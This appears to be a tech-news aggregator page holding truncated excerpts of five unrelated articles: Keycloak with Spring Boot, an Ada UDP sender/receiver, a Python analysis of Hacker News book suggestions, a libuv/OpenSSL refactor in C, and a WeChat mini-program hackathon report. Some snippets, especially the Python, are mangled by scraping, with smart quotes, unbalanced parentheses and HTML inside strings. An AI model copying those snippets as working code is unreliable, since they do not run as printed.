Quantcast
Channel: CodeSection,代码区,网络安全 - CodeSec
Viewing all 12749 articles
Browse latest View live

Securing Spring Microservices with Keycloak Part 2

$
0
0

In thefirst part we setup a local Keycloak instance. In this blog we will see how we can leverage Keycloak to secure our frontend.

For this purpose we will create a small Spring Boot application that will serve a webpage.The next and last blog will show how authentication can be used between services.

Architecture overview

As mentioned we will create a small Spring Boot microservice and secure it using Spring Security and Keycloak. The service that we will create in this blog is the “frontend” Spring Service. It serves a simple web page that displays a hello message including the users email adres as registered in Keycloak.

The next blog we will build the service and propagate the authorization from to frontend to service we cal. This way we build a complete Single Sign-On solution.


Securing Spring Microservices with Keycloak   Part 2
The Frontend service Create a project

We start by creating a new Spring project using cURL.

curl -s start.spring.io/starter.tgz \ -d type=gradle-project \ -d groupId=net.vanweenen.keycloak \ -d artifactId=frontend \ -d language=java \ -d dependencies=web,thymeleaf,keycloak,security \ -d baseDir=keycloak-frontend | tar -xzvf - keycloak dependency

By using the above project generation we have automatically added the Keycloak and Spring Security dependencies. You can look them up in the build . gradle file. However for the purpose of this blog we will be using Keycloak 4.4.0 that was released on6September 2018.

ext { keycloakVersion = '4.4.0.Final' } Property Configuration

Next we need to configure where the Keycloak instance we started is located and what realm and client we use. Also we configure our frontend to run on port 8081 because Keycloak itself is already running on 8080.

In the first blog we configured http : //localhost:8081 as a valid redirect url in the login-app client. We can’t use the Keycloak login page from any other location.

Lastly we enable the logging for Keycloak so we can see what it happens internally.

server.port=8081 keycloak.auth-server-url=http://localhost:8080/auth keycloak.realm=springservice keycloak.resource=login-app keycloak.public-client=true logging.level.org.keycloak=TRACE Java configuration

After configuring the the Keycloak adapter we need to configure Spring Security to use the adapter. We also need to configure our security rules.

To do that create a SecurityConfig class.In here we configure Spring security to use Keycloak. This is done by setting the authenticationProvider on the AuthenticationManagerBuilder .

For public or confidential applications we need to use a session authentication strategy applications so we can redirect to Keycloak. For bearer-only applications (typically api backend services) we provide a NullAuthenticatedSessionStrategy .

Next we configure our websecurity to authorize requests to the /greetings endpoint for any user with the USER role. Spring Security prefixes the role name with ROLE_ . That is the reason we created the ROLE_USER role when configured Keycloak in part 1.

Lastly we make our Keycloak Adapter Spring Boot aware. This way it won’t look for a keycloak . json configuration file but uses the adapter configuration.

@KeycloakConfiguration public class SecurityConfig extends KeycloakWebSecurityConfigurerAdapter { /** * Registers the KeycloakAuthenticationProvider with the authentication manager. */ @Autowired public void configureGlobal(AuthenticationManagerBuilder auth) throws Exception { auth.authenticationProvider(keycloakAuthenticationProvider()); } /** * Defines the session authentication strategy. */ @Bean @Override protected SessionAuthenticationStrategy sessionAuthenticationStrategy() { return new RegisterSessionAuthenticationStrategy(new SessionRegistryImpl()); } @Override protected void configure(HttpSecurity http) throws Exception { super.configure(http); http .authorizeRequests() .antMatchers("/greetings*").hasRole("USER") .anyRequest().denyAll(); } // Spring boot integration @Bean public KeycloakConfigResolver KeycloakConfigResolver() { return new KeycloakSpringBootConfigResolver(); } } Avoid double Filter bean registration

Spring Boot attempts to eagerly register filter beans with the web application context. Therefore, when running the Keycloak Spring Security adapter in a Spring Boot environment, it may be necessary to add FilterRegistrationBean s to your security configuration to prevent the Keycloak filters from being registered twice.

@KeycloakConfiguration public class SecurityConfig extends KeycloakWebSecurityConfigurerAdapter { ... @Bean public FilterRegistrationBean keycloakAuthenticationProcessingFilterRegistrationBean( KeycloakAuthenticationProcessingFilter filter) { FilterRegistrationBean registrationBean = new FilterRegistrationBean(filter); registrationBean.setEnabled(false); return registrationBean; } @Bean public FilterRegistrationBean keycloakPreAuthActionsFilterRegistrationBean( KeycloakPreAuthActionsFilter filter) { FilterRegistrationBean registrationBean = new FilterRegistrationBean(filter); registrationBean.setEnabled(false); return registrationBean; } @Bean public FilterRegistrationBean keycloakAuthenticatedActionsFilterBean( KeycloakAuthenticatedActionsFilter filter) { FilterRegistrationBean registrationBean = new FilterRegistrationBean(filter); registrationBean.setEnabled(false); return registrationBean; } @Bean public FilterRegistrationBean keycloakSecurityContextRequestFilterBean( KeycloakSecurityContextRequestFilter filter) { FilterRegistrationBean registrationBean = new FilterRegistrationBean(filter); registrationBean.setEnabled(false); return registrationBean; } ... } The web page

We configured that users with the USER role should be allowed to access the / greetings endpoint. So now we need to provide a simpel page.

Create a GreetingController that provides a GetMapping. Let Spring inject a Model and an Authentication. In the model we can put information needed to render the page. The Authentication can be used to get user information.

@Validated @Controller public class GreetingController { @GetMapping("/greetings") public String greeting(@NotNull Model model, @NotNull Authentication auth) { String email = ((SimpleKeycloakAccount) auth.getDetails()) .getKeycloakSecurityContext() .getToken() .getEmail(); model.addAttribute("name", email); return "greetings"; } }

This controller will add the email adres of the user to the model under the “name” attribute and render the page.

The page is defined in the resources / templates folder

SMG Comms Chapter 13: Sender and Receiver

$
0
0

~ This is a work in progress towards an Ada implementation of Eulora's communication protocol. Start withChapter 1.~

This chapter adds to SMG Comms a thin wrapper package that effectively rescues the queue of UDP messages from the IP stack (where it's relatively small) into memory (where it can be, by comparison, large). Once the decision has been clearly made as to what the sender/receiver should do and moreover I finally seem to have gotten my head around using Ada's threads, the implementation is deliciously straightforward. Who could have predicted this ?! Let's see directly the new Snd_Rcv package as it's very easy to read indeed:

--Sender and Receiver task types for Eulora's Communication Protocol --This is a THIN layer on top of UDP lib, mainly to move messages out -- of the small queue of the IP stack onto a bigger, in-memory queue. --There is NO processing of messages here: just read/write from/to UDP. --S.MG, 2018 with Interfaces; with Msg_Queue; with UDP; generic -- exact length of payload aka whether RSA or Serpent Len: in Positive; package Snd_Rcv is -- queue package with specified payload length package M_Q is new Msg_Queue( Payload_Len => Len); -- outbound and inbound messages queues -- those are meant to be accessed from outside the package too! out_q : M_Q.Queue; in_q : M_Q.Queue; -- sender type of task: takes msgs out of out_q and sends them via UDP task type Sender( Port: Interfaces.Unsigned_16); -- receiver type of tasks: reads incoming msgs from UDP and puts them in in_q task type Receiver( Port: Interfaces.Unsigned_16); private -- udp lib package with specified payload length package M_UDP is new UDP( Payload_Size => Len); end Snd_Rcv;

As it can be seen above, the package simply packs in one place an outbound message queue (out_q), an inbound message queue (in_q) and the definitions of two types of tasks: the Sender and the Receiver. The two queues act effectively as mailboxes: all and any tasks from anywhere else are invited to just drop their outbound packages into out_q and /or get incoming packages from in_q. Note that both those queues are thread-safe so there is no concern here over who tries to read/write and when - at most, a task may end up blocked waiting on an empty queue (when trying to read a message) or on a full queue (when trying to write a message).

If the two out_q and in_q are mailboxes, then the two types of tasks, Sender and Receiver, are postmen. They share the same underlying UDP package that is private here (only postmen are allowed to use the UDP post van!) and has a fixed size of messages. Note that this fixed size is given as a parameter to the Snd_Rcv package itself and is then used both for the queues and for the UDP package. Essentially the snd_rcv package is a postal service that handles just one pre-defined length of messages. An application may use of course as many different lengths of message it requires - all it needs to do is to create a different snd_rcv package (i.e. "postal service") for each of those lengths. Note also that the actual ports used by the Sender and Receiver are given as parameters - an application can create as many Sender/Receiver tasks as it wants and even bind them to different ports or to the same port, as desired. This gives maximum flexibility: an application can listen for messages on one port and send them out on a different port, while still having everything in one single queue; or it can listen and send through the same port via any number of Sender/Receiver tasks. Each Sender and Receiver task will simply bind its own local socket and then enter an endless loop in which the Sender picks up messages from the out_q and sends them through its socket via UDP lib, while the Receiver picks up messages from its socket via the UDP lib and writes them into in_q. The corresponding code is short (and it's made slightly longer by my choice of having each Sender/Receiver use its own local socket):

-- S.MG, 2018 package body snd_rcv is -- sender task body Sender is E : M_UDP.Endpoint; S : M_UDP.Socket; Payload : M_Q.Payload_Type; Dest : M_UDP.Endpoint; begin -- open the socket on local interface, specified port E.Address := M_UDP.INADDR_ANY; E.Port := Port; M_UDP.Open_Socket( S, E ); -- infinite loop reading from out queue and sending via udp -- caller will have to call abort to stop this! loop out_q.Get( Payload, Dest.Address, Dest.Port); M_UDP.Transmit( S, Dest, Payload); end loop; end Sender; -- receiver task body Receiver is E : M_UDP.Endpoint; Source : M_UDP.Endpoint; S : M_UDP.Socket; Payload: M_Q.Payload_Type; Valid : Boolean; begin -- open the socket on local interface, specified port E.Address := M_UDP.INADDR_ANY; E.Port := Port; M_UDP.Open_Socket( S, E ); -- infinite loop reading from out udp and writing to inbound queue -- caller will have to call abort to stop this! loop M_UDP.Receive( S, Source, Payload, Valid); -- store ONLY if valid, otherwise discard if Valid then in_q.Put( Payload, Source.Address, Source.Port); end if; end loop; end Receiver; end snd_rcv;

An alternative approach to the above (and one that I have implemented at first) was to have a single task Snd_Rcv that bound one single socket and then started on it its own sub-tasks for the actual sender and receiver. However, I find such an approach needlessly complicated and inflexible: it creates an additional layer in the hierarchy of tasks for no clear benefit (perhaps it would make sense if one added some sort of additional management of the sender/receiver tasks in there but at the moment it's unclear that any such thing is actually needed or needed here of all places); it is harder to read with the single and so far unconvincing benefit of a shared socket (so no repeated binding code); it forces some choices on any application using this package: the sender/receiver are forced as a package so there is no more option of just listening on a port and/or just sending on it; there is also no option of listening on one port and sending on another or indeed of creating - if needed - more senders than receivers or the other way around. Sure, it can be argued that several senders and receivers are anyway not likely to be required or that binding too many is likely to just increase packet loss or any other trouble. This is however up to higher levels of the application rather than the concern of this thin sender/receiver and since this implementation offers both highest flexibility AND highest clarity, I think it's the best option so far. As usual, feel free to let me know in the comments your reasons for disagreeing with this and your better solution for implementing a sender/receiver layer.

The above tiny amount of code would be all for this chapter if it weren't for 3 things: the need to relax yet another few restrictions; an example/test of using the above sender/receiver package; my decision to include the UDP lib as just another package of SMG comms rather than keeping it as a separate lib. This last part concerning the UDP lib accounts for most lines in the .vpatch and is essentially some noise at this level (since vdiff is not yet bright enough to figure out a move of files). The reason for it is mainly the fact that the UDP code is really meant to be used from this snd_rcv package and from nowhere else so I can't quite see the justification in keeping it entirely separate, with a .gpr file and everything else of its own and moreover - perhaps more importantly from a practical point of view - unable to directly use the basic types of smg_comms in raw_types. Note that this move does *not* make it in any significant way more difficult to replace this UDP code with another at a later time if that becomes available - it's still one package and those pesky C files, nothing else.

Going back to the need to relax a few restrictions - those are mainly restrictions related to the use of tasks. As both Sender and Receiver work in infinite loops, the caller has to ruthlessly abort them when it needs them to finish (in Ada a task has to wait for all its sub-tasks to finish before it can finish itself). So the "No_Abort_Statements" restriction needs to go. The use of Abort is illustrated in the test/example code I wrote aka test_client and test_server. Similarly, because of the queues that use protected objects, the "No_Local_Protected_Objects" restriction had to go too. Here I must say that I am not sure I fully grasp why would it be better to have protected objects only as global rather than local? They are of course meant to be accessed from many places and therefore in "global" but this doesn't mean that they don't still belong somewhere and/ or that "access from several places" has to mean "access from ALL places". Finally, the restriction "No_Nested_Finalization" also had to go to allow the testing code to create the snd_rcv packages with different length of messages.

The testing code itself provides more of an example of using the snd_rcv package rather than a test as such since UDP communications are unreliable and therefore one can't really say in advance what one should get on the other side of the connection. At any rate, the test_server package provides an example of a basic "echo server" end of the connection: there are 2 Sender and 2 Receiver tasks working with Serpent-length and RSA-length packages on 2 different ports, respectively; there is also a "consumer" task for each type of package, simply taking it out of the inbound queue, printing it at the console and then echoing it back to the source aka writing it into the outbound queue for the Sender to send. The example awaits for a pre-defined total number of packages so it may remain waiting if the other end sends fewer packages or fewer packages make it all the way. At any rate, once all the expected messages are received, the whole application (aka the main task) simply aborts all the tasks it created and then finishes itself:

-- S.MG, 2018 with Ada.Text_IO; use Ada.Text_IO; with Interfaces; with Snd_Rcv; with Raw_Types; procedure Test_Server is PortRSA: Interfaces.Unsigned_16 := 44340; PortS : Interfaces.Unsigned_16 := 44341; N_S : Interfaces.Unsigned_8 := 105; N_RSA : Interfaces.Unsigned_8 := 82; package Snd_Rcv_RSA is new Snd_Rcv(Raw_Types.RSA_Pkt'Length); package Snd_Rcv_S is new Snd_Rcv(Raw_Types.Serpent_Pkt'Length); -- sender/receiver tasks -- -- sender RSA and Serpent Sender_RSA: Snd_Rcv_RSA.Sender( PortRSA ); Sender_S : Snd_Rcv_S.Sender( PortS ); -- receiver RSA and Serpent Receiver_RSA: Snd_Rcv_RSA.Receiver( PortRSA ); Receiver_S: Snd_Rcv_S.Receiver( PortS ); -- Serpent Consumer task s_cons is Entry Finish; end s_cons; task body s_cons is Payload: Raw_Types.Serpent_Pkt; A: Interfaces.Unsigned_32; P: Interfaces.Unsigned_16; begin for I in 1..N_S loop -- consume one message and echo it back Snd_Rcv_S.in_q.Get(Payload, A, P); Put_Line("S msg " & Interfaces.Unsigned_8'Image(Payload(Payload'First)) & " from " & Interfaces.Unsigned_32'Image(A) & ":" & Interfaces.Unsigned_16'Image(P)); -- echo it back Snd_Rcv_S.out_q.Put(Payload, A, P); end loop; accept Finish; Put_Line("S Cons got the finish."); end s_cons; -- RSA Consumer task rsa_cons is Entry Finish; end rsa_cons; task body rsa_cons is Payload: Raw_Types.RSA_Pkt; A: Interfaces.Unsigned_32; P: Interfaces.Unsigned_16; begin for I in 1..N_RSA loop -- consume one message and echo it back Snd_Rcv_RSA.in_q.Get(Payload, A, P); Put_Line("RSA msg " & Interfaces.Unsigned_8'Image(Payload(Payload'First)) & " from " & Interfaces.Unsigned_32'Image(A) & ":" & Interfaces.Unsigned_16'Image(P)); -- echo it back Snd_Rcv_RSA.out_q.Put(Payload, A, P); end loop; accept Finish; Put_Line("RSA Cons got the finish."); end rsa_cons; begin Put_Line("Test server"); -- wait for consumers to finish rsa_cons.Finish; s_cons.Finish; -- abort the sender & receiver to be able to finish abort Sender_S, Receiver_S, Sender_RSA, Receiver_RSA; end Test_Server;

Similarly to the server example code above, an example client sends both RSA and Serpent packages and has consumer and producer tasks for both:

-- S.MG, 2018 with Snd_Rcv; with Interfaces; with Ada.Text_IO; use Ada.Text_IO; with Raw_Types; with UDP; procedure Test_Client is PortRSA : Interfaces.Unsigned_16 := 34340; PortS : Interfaces.Unsigned_16 := 34341; N_S : Interfaces.Unsigned_8 := 105; N_RSA : Interfaces.Unsigned_8 := 82; Server : String := "127.0.0.1"; package test_udp is new UDP(10); ServerA : Interfaces.Unsigned_32 := test_udp.IP_From_String(Server); ServerRSA : Interfaces.Unsigned_16 := 44340; ServerS : Interfaces.Unsigned_16 := 44341; package Snd_Rcv_RSA is new Snd_Rcv(Raw_Types.RSA_Pkt'Length); package Snd_Rcv_S is new Snd_Rcv(Raw_Types.Serpent_Pkt'Length); -- sender RSA and Serpent Sender_RSA: Snd_Rcv_RSA.Sender( PortRSA ); Sender_S : Snd_Rcv_S.Sender( PortS ); -- receiver RSA and Serpent Receiver_RSA: Snd_Rcv_RSA.Receiver( PortRSA ); Receiver_S: Snd_Rcv_S.Receiver( PortS ); -- producer of serpent messages task s_prod is entry Finish; end s_prod; task body s_prod is Payload : Raw_Types.Serpent_Pkt := (others => 10); begin Put_Line("S Producer with " & Interfaces.Unsigned_8'Image(N_S) & "messages."); -- send the messages with first octet the number for I in 1..N_S loop Payload(Payload'First) := I; Snd_Rcv_S.out_q.Put( Payload, ServerA, ServerS); Put_Line("Sent S message " & Interfaces.Unsigned_8'Image(I)); end loop; -- signal it's done accept Finish; Put_Line("S prod got the finish."); end s_prod; -- producer of RSA messages task rsa_prod is Entry Finish; end rsa_prod; task body rsa_prod is Payload : Raw_Types.RSA_Pkt := (others => 20); begin Put_Line("RSA Producer with " & Interfaces.Unsigned_8'Image(N_RSA) & "messages."); -- send the messages with first octet the number for I in 1..N_RSA loop Payload(Payload'First) := I; Snd_Rcv_RSA.out_q.Put( Payload, ServerA, ServerRSA); Put_Line("Sent RSA message " & Interfaces.Unsigned_8'Image(I)); end loop; -- signal it's done accept Finish; Put_Line("RSA prod got the finish."); end rsa_prod; -- Serpent Consumer task s_cons is Entry Finish; end s_cons; task body s_cons is Payload: Raw_Types.Serpent_Pkt; A: Interfaces.Unsigned_32; P: Interfaces.Unsigned_16; begin for I in 1..N_S loop -- consume one message Snd_Rcv_S.in_q.Get(Payload, A, P); Put_Line("S msg " & Interfaces.Unsigned_8'Image(Payload(Payload'First)) & " from " & Interfaces.Unsigned_32'Image(A) & ":" & Interfaces.Unsigned_16'Image(P)); -- do NOT echo it back end loop; accept Finish; Put_Line("S Cons got the finish."); end s_cons; -- RSA Consumer task rsa_cons is Entry Finish; end rsa_cons; task body rsa_cons is Payload: Raw_Types.RSA_Pkt; A: Interfaces.Unsigned_32; P: Interfaces.Unsigned_16; begin for I in 1..N_RSA loop -- consume one message Snd_Rcv_RSA.in_q.Get(Payload, A, P); Put_Line("RSA msg " & Interfaces.Unsigned_8'Image(Payload(Payload'First)) & " from " & Interfaces.Unsigned_32'Image(A) & ":" & Interfaces.Unsigned_16'Image(P)); -- do NOT echo back end loop; accept Finish; Put_Line("RSA Cons got the finish."); end rsa_cons; begin Put_Line("Test client"); -- wait for producers/consumers to finish rsa_prod.Finish; s_prod.Finish; rsa_cons.Finish; s_cons.Finish; -- abort the sender & receiver to be able to finish abort Sender_S, Receiver_S, Sender_RSA, Receiver_RSA; end Test_Client;

One important issue to note here is the way in which exceptions (hence: potential issues) will be handled in this specific implementation of the Snd_Rcv package: since the Sender and Receiver are tasks and don't handle any exceptions themselves, it means that an UDP "eggog" aka exceptionwill have as effect the silent death of the Sender/Receiver in which it happens. I did consider ways of handling such exceptions rather than letting them kill the task silently but so far at least I don't quite see what the task itself can do other than re-trying whatever it was trying to do when it failed. While this could perhaps be considered a better option than not handling exceptions at all, it's been pointed to me that UDP errors mean almost always some hardware failure and as such a re-try is not going to help at all. Moreover, re-trying means also that the failure remains hidden from the calling task since there is no way in which one would be able to tell whether a task is just stuck re-trying or actually proceeding with its work just fine. Considering all this, I decided to leave it for now to the higher level task to monitor its subtasks if/when desired and take action accordingly (e.g. check perhaps periodically if a Sender/Receiver is Terminated or in other abnormal state). This doesn't mean of course that the code can't be changed at a later date to provide a different approach to handling this - all it means is that currently this is the best decision I can see given what I know so far.

With this chapter, the SMG Comms code provides everything that is needed to build on top of it a basic client for Eulora that is compliant with the published communication protocol. So I'd suggest to anyone interested in this to give it a go since starting now means that they would have some time to tinker with it before everything else is in place! At any rate, the SMG Comms series takes at least a break for now (at a later stage there should be a few bits and pieces to add) as I'll focus for a while more on the server-side moving parts that need to be done before Eulora can finally fully work on a sane protocol. The full .vpatch for this chapter and my signature for it:

smg_comms_sender_receiver.vpatch smg_comms_sender_receiver.vpatch.diana_coman.sig

Hacker News book suggestions

$
0
0
Analyzing Hacker News book suggestions inpython

An analysis of an Hacker News thread, using Python, Hacker News API and Goodreads API, and the definitive top 20 book suggestion list!

Alessandro Mozzato


Hacker News book suggestions

A few days ago the traditional “what books did you read this year” thread popped up on Hacker News. The thread is full of very nice book suggestions. Attempting to make a reading list for next year I though it would be fun to get the data and analyze it. In the following article I will show how I used Hacker News’ API to scrape the posts content, how I selected the most common titles and checked them against Goodreads API and finally how I came up with the definitive top 20 most recommended books. As always, dealing with text data is anything but straightforward. The final result, however, is quite satisfying!

Scraping the thread: Hacker NewsAPI

The first step is getting the data. Luckily, Hacker News provides a very nice API to freely scrape all of its content. The API has endpoints for posts, users, top posts a few others. For this article we will use the one for posts. It’s very simple to use, here is the basic syntax: v0/item/{id}/.json where id is the item we are interested in. In this case the thread’s id is 18661546 , so here is an example on how to get the main page data:

import requests
main _page = requests.request(‘GET’, ‘https://hackernews.firebaseio.com/v0/item/18661546.json').json())

The same API call is also used for the sub posts of a thread or a post, whose ids can be found in the kids key of the parent post. Looping over the kids we can get the text of every post in the thread.

Cleaning thedata

Now that we have the text data we want to extract book titles from it. One possible approach would be to look for all Amazon or Goodreads links in the article and just group by that. This is a clean approach because it doesn’t depend on any text processing. However, just from taking a quick look at the thread it is clear that the vast majority of suggestions do not have any link associated to them. So I decided to go for the more difficult route: grouping ngrams together and match those ngrams with possible books.

So, after eliminating special characters from the text I grouped together bigrams, trigrams, 4-grams and 5-grams and count the occurrences. This is an example to count bigrams:

import re from collections import Counter import operator # clean special characters text_clean = [re.sub(r"[^a-zA-Z0-9]+", ' ', k) for t in text for k in t.split("\n")] # count occurrences of bigrams in different posts countsb = Counter() words = re.compile(r'\w+') for t in text_clean: w = words.findall(t.lower()) countsb.update(zip(w,w[1:])) # sort results bigrams = sorted( countsb.items(), key=operator.itemgetter(1), reverse=True )

Usually in text application one of the first thing to do while processing the data is to eliminate stopwords, i.e. the most common words in a language, like articles and prepositions. In our case we did not eliminate stopwords from our text yet, therefore most of these ngrams would be almost exclusively composed of stopwords. In fact, here is a sample output of the top 10 most common bigrams in our data:

[((u'of', u'the'), 147), ((u'in', u'the'), 76), ((u'it', u's'), 67), ((u'this', u'book'), 52), ((u'this', u'year'), 49), ((u'if', u'you'), 45), ((u'and', u'the'), 44), ((u'i', u've'), 44), ((u'to', u'the'), 40), ((u'i', u'read'), 37)]

Having stopwords in our data is fine, most title books would have stopwords in them so we want to keep these. However, to avoid looking up too many combinations we eliminate the ngrams that are solely composed of stopwords, keeping all the others.

Checking book titles: the Goodreads API

Now that we have a list of possible ngrams we will use the Goodreads API to check if these ngrams correspond to book titles. In case multiple matches are available for a search I decided to take the most recent publication as the result of the search. This is assuming that the most recent book would be the most likely match for this context. This is of course an assumption that might lead to errors.

The Goodreads API is a bit less straightforward to use than the Hacker News one as it returns results in XML, which is less friendly to use than the JSON format. In this analysis I used the xmltodict python package to convert the XML to JSON. The API method we need is search.books which allows to search books by title, author or ISBN. Here is a code sample to get book title and author for the most recently published search result:

import xmltodict res = requests.get("<a href="https://www.goodreads.com/search/index.xml" data-href="https://www.goodreads.com/search/index.xml" rel="nofollow noopener" target="_blank">https://www.goodreads.com/search/index.xml</a>" , params={"key": grkey, "q":'some book title'}) xpars = xmltodict.parse(res.text) json1 = json.dumps(xpars) d = json.loads(json1) lst = d['GoodreadsResponse']['search']['results']['work'] ys = [int(lst[j]['original_publication_year']['#text']) for j in range(len(lst))] title = lst[np.argmax(ys)]['best_book']['title'] author = lst[np.argmax(ys)]['best_book']['author']['name']

This method allows us to associate ngrams to possible books. We check the list of books we get matching all ngrams with the Goodreads API against the full text data. Before performing the actual check we cut the book names eliminating punctuation (particularly semicolumns) and subtitles. We only consider the main title with assumption that most of the time only this part of the title would be used (some of the full titles in the list are actually really long!). Ranking the results we get by number of occurences in the thread we get this list:


Hacker News book suggestions
Books with more than 3 counts in thethread So Bad Blood looks to be the top most recommended book in the thread. Checking the other results most of them seems to make sense and match with the thread, including the counts. The only big mistake I could spot in the list is for position number 2, where the book Magi was identified instead of The Magicians by Lev Grossman. The latter is indeed cited 7 times in the text. This error is caused by the assumption we

Refactoring C Code: Going to Async I/O

$
0
0

Now that I have a good idea on how to use OpenSSL andlibuvtogether , I’m going to change my code to support that mode of operation. I have already thought about this a lot, and the code I already have is ready to receive the change in behavior, I think.

One of the things that I’m going to try to do while I move the code overis properly handleall error conditions. We’ll see how that goes.

I already have the concept of a server_state_run () method that handles all the network activity, dispatching, etc. So that should make it easy. I’m going to start by moving all thelibuvcode there. I’m also going to take the time to refactor everything to an API that is more cohesive and easier to deal with.

There is some trouble here, with having to merge together two similar (but not quite identical) concepts. MylibuvandOpenSSL post dealt with simply exposing a byte stream to the calling code. My network protocol code is working at a higher level. Initially, I tried to layer things together, but that quickly turned out to be a bad idea. I decided to have a single layer that handles both the reading from the network, using OpenSSL and parsing the commands over the network.

The first thing to do was to merge the connection state, I ended up with this code:

struct tls_uv_connection_state_private_members { server_state_t* server; uv_tcp_t* handle; SSL *ssl; BIO *read, *write; struct { tls_uv_connection_state_t** prev_holder; tls_uv_connection_state_t* next; int in_queue; size_t pending_writes_count; uv_buf_t* pending_writes_buffer; } pending; size_t used_buffer, to_scan; int flags; }; #define RESERVED_SIZE (64 - sizeof(struct tls_uv_connection_state_private_members)) #define MSG_SIZE (8192 - sizeof(struct tls_uv_connection_state_private_members) - 64 - RESERVED_SIZE) // This struct is exactly 8KB in size, this // means it is two OS pages and is easy to work with typedef struct tls_uv_connection_state { struct tls_uv_connection_state_private_members; char reserved[RESERVED_SIZE]; char user_data[64]; // location for user data, 64 bytes aligned, 64 in size char buffer[MSG_SIZE]; } tls_uv_connection_state_t; static_assert(offsetof(tls_uv_connection_state_t, user_data) % 64 == 0, "tls_uv_connection_state_t.user should be 64 bytes aligned"); static_assert(sizeof(tls_uv_connection_state_t) == 8192, "tls_uv_connection_state_t should be 8KB");

There are a few things that are interesting here. On the one hand, I want to keep the state of the connection private, but on the other, we need to expose this out to the user to use some parts of it. The waylibuvhandles it is with comments denoting whatareconsidered public/private portions of the interface. I decided to stick it in a dedicated struct. This also allowed me to get the size of the private members, which is important for what I wanted to do next.

The connection state structhavethe following sections:

private/reserved 64 bytes available foruserto use 64 bytes (and aligned on 64 bytes boundary) msg buffer 8,064 bytes

The idea here is that we give the user some space to keep their own datain,and that the overall connection state size is exactly 8KB, so can fit in two OS pages. On linux, in most cases, we’ll not need a buffer that is over 3,968 bytes long, we can even save thesecond pagematerialization (because the OS lazily allocate memory to the process). I’m using 64 bytes alignment for the user’s data to reduce any issues that the user have for storing data about the connection. It will also keep it nicely within the data the userneedto handle the connection nearby the actual buffer.

I’m 99% sure that I won’t need any of these details, but I thought it is best to think ahead, and it was fun to experiment.

Here is how the startup code for the server changed:

connection_handler_t handler = { print_all_errors, on_connection_dropped, create_connection, on_connection_recv }; server_state_init_t options = { cert, key, "0.0.0.0", 4433, &handler, { // allowed certs "1776821DB1002B0E2A9B4EE3D5EE14133D367009" , "AE535D83572189D3EDFD1568DC76275BE33B07F5" }, 2 // number of allowed certs }; srv_state = server_state_create(&options);

I removed pretty much all the functions that were previously used to build it. We have the server_state_init_t struct, which contains everything that is required for the server to run. Reducing the number of functions to build this means that I have to do less and there is a lot less error checking to go through. Most of the code that I had to touch didn’t require anything interesting. Take the code from thelibuv/opensslproject, make sure it compiles, etc. I’m going to skip talking about the boring stuff.

I did run into a couple of issues that are worth talking about. Error handling and authentication. As mentioned, I’m using client certificates for authentication, but unlike my previous code, I’m not explicitly calling SSL_accept() , instead, I rely on OpenSSL to manage the state directly.

This means that I don’t have a good location to put the checks on the client certificate that is used. For that matter, our protocol starts with the server sending an: “OK\r\n” message to the client to indicate a successfulconnection. Where does this go? I put all of this code inside the handle_read() method.

int ensure_connection_intialized(tls_uv_connection_state_t* state) { if (state->flags & CONNECTION_STATUS_INIT_DONE) return 1; if (SSL_is_init_finished(state->ssl)) { state->flags |= CONNECTION_STATUS_INIT_DONE; if (validate_connection_certificate(state) == 0) { state->flags |= CONNECTION_STATUS_WRITE_AND_ABORT; return 0; } return connection_write(state, "OK\r\n", 4); } return 1; } void handle_read(uv_stream_t *client, ssize_t nread, const uv_buf_t *buf) { tls_uv_connection_state_t* state = client->data; if (nread <= 0) { push_libuv_error(nread, "Unable to read"); state->server->options.handler->connection_error(state); abort_connection_on_error(state); return; } int rc = BIO_write(state->read, buf->base, nread); assert(rc == nread); while (1) { int rc = SSL_read(state->ssl, buf->base, buf->len); if (rc <= 0) { rc = SSL_get_error(state->ssl, rc); if (rc != SSL_ERROR_WANT_READ) { push_ssl_errors(); state->server->options.handler->connection_error(state); abort_connection_on_error(state); break; } maybe_flush_ssl(state); ensure_connection_intialized(state); // need to read more, we'll let libuv handle this break; } // should be rare: can only happen if we go for 0rtt or something like that // and we do the handshake and have real data in one network roundtrip if (ensure_connection_intialized(state) == 0) break; if (state->flags & CONNECTION_STATUS_WRITE_AND_ABORT) { // we won't accept anything from this kind of connection // just read it out of the network and let's give the write // a chance to kill it continue; } if (read_message(state, buf->base, rc) == 0) { // handler asked to close the socket if (maybe_flush_ssl(state)) { state->flags |= CONNECTION_STATUS_WRITE_AND_ABORT; break; } abort_connection_on_error(state); break; } } free(buf->base); }

This method is called wheneverlibuvhas more data to give us on the connection. The actual behavior is on ensure_connection_intialized() , where we check a flag on the connection, and if we haven’t done the initialization of the connection, we checkiOpenSSL consider the connection established. If it is established, we validate the connection and then send the OK to start the ball rolling.

You might have noticed a bunch of work with flags CONNECTIO

微信小程序黑客马拉松落幕,28小时见证27个小程序从0到1诞生!

$
0
0

2018 年 12 月 16 日下午,由腾讯公司微信事业群主办的「WeGeek 微信小程序黑客马拉松」(WeGeek Hackathon)在北京顺利闭幕。 WeGeek Hackathon 是面向全球小程序开发者、爱好者的黑客马拉松,旨在通过微信小程序平台进行小程序的创新开发,共同建设小程序生态。


微信小程序黑客马拉松落幕,28小时见证27个小程序从0到1诞生!
WeGeek Hackathon,最酷的Mini Program Creators聚集地

本次 WeGeek Hackathon 主题分为「工具、生活服务、教育」三大类目,一经发布即引起了圈内外广泛关注,报名人数在两周内超过 500 人。经过两轮筛选后, 160 名 开发者入围并参与最后的角逐。


微信小程序黑客马拉松落幕,28小时见证27个小程序从0到1诞生!

在这 160 名开发者和爱好者中,有来自一线互联网公司的开发工程师,武汉大学、电子科大等高校学生、以及来自台湾的小程序爱好者。他们或对小程序的使用场景有着深刻的理解,或非常熟练掌握小程序的开发技能,可谓是最酷的 Mini Program Creators 聚集地!

28小时!见证27个小程序从0到1的诞生

12 月 15 日上午 9 点开始,160 名小程序开发者和爱好者组队,在现场通过28小时的封闭式开发, 从 0 到 1 创造出了 27 个 全新产品并参与评选。


微信小程序黑客马拉松落幕,28小时见证27个小程序从0到1诞生!

这 27 个小程序, 涉及 到教育、交通、出行、工具、大数据等多个行业或领域; 利用 到了扫码、分享、拍照、地图、AI、语音、AR 等众多接口, 解决了 幼儿园管理、口语学习、线上拼车、社团管理、灵感记录、活动报名、健康管理、抽奖、打卡等多个真实场景下的问题。

小小幼教小程序解决了幼儿园老师在学生签到,给家长分享小朋友照片、布置作业等真实场景下的问题,甚至在小朋友走失的场景下提供了一定的帮助功能。

AI 有声小程序基于深度学习引擎,将 AI 与 AR 技术融合,提供了便捷的实时手语翻译功能。不仅为普通人学习手语提供了更好的指导,更为 3000 万聋哑人更好地融入社会提供帮助。

